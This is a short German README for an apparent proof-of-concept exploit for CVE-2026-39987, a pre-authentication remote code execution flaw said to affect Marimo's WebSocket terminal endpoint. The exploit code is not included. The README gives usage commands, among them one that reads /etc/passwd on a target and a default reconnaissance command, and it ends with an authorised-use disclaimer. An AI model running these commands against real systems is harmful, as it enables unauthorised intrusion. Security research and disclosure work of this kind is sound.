
Einfacher POC für CVE-2026-39987
Dieses Repository enthält ein Proof-of-Concept-Skript (POC) für CVE-2026-39987, eine Remote-Code-Execution-Schwachstelle (RCE) vor der Authentifizierung in Marimo. Der Exploit nutzt einen WebSocket-Endpunkt, um beliebige Befehle auf dem Zielsystem auszuführen.
/terminal/ws)pip install websocket-client
python exploit.py -u <TARGET_URL> [-c ""]
python exploit.py -u http://example.com:2718 -c "cat /etc/passwd"
-u, --url: Ziel-URL (z. B. http://localhost:2718)
-c --command: Auszuführender Befehl (Standard: id && whoami && hostname)
-h, --help
Dieses Skript dient ausschließlich Bildungs- und Forschungszwecken.
Verwenden Sie es verantwortungsbewusst und nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung besitzen.
Missbrauch dieses Tools kann unbeabsichtigte Folgen und potenzielle Sicherheitsrisiken verursachen.
Durch die Verwendung dieses Skripts erkennen Sie an, dass Sie allein für alle ergriffenen Maßnahmen verantwortlich sind.